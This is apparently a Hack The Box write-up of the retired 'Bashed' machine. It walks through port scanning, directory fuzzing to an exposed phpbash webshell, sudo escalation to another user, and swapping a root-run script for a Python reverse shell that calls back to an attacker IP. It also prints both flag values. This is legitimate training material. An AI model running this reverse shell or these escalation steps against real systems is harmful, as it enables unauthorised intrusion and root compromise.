BashedPlatform: Hack The Box
IP Address: 10.10.10.68
Difficulty: Easy Linux
Bashed is a fairly easy machine focused on web fuzzing and identifying exposed files and services. The box is a great example of privilege escalation via exposed scripts and improper sudo permissions. Enumeration is key, as initial foothold is obtained through an exposed phpbash webshell.
nmap -p- 10.10.10.68 --min-rate 10000
nmap -p 80 10.10.10.68 -sCV -oN nmapscan
http://bashed.htb → exposed phpbash script in development.dirsearch -u http://bashed.htb
/dev/ → phpbash.php shellAlso verified with gobuster:
gobuster dir -u http://10.10.10.68/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
/dev/phpbash.php → initial webshell as www-data./dev/phpbash.php and spawned interactive shell:whoami
# www-data
/home → found users:/home/arrexel
/home/scriptmanager
cat /home/arrexel/user.txt
af827e749b08685a006408eaf072b8f3
User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL
sudo -u scriptmanager /bin/bash
/scripts/test.py → observed that it runs as root.Replaced test.py with reverse shell:
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.26",80))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
Started listener:
nc -nlvp 80
Gained root shell:
whoami
# root
cat /root/root.txt
249277f71cf2bb8e0ec15a570c8fdfdf
Writeup by inksec
GitHub: https://github.com/inkedqt
- 🧪 [HTB: Bashed](https://github.com/inkedqt/ctf-writeups/tree/main/HTB/Retired/bashed)
Web fuzzing → PHPbash webshell → User enumeration → Sudo to scriptmanager → Privileged script abuse → Reverse shell as root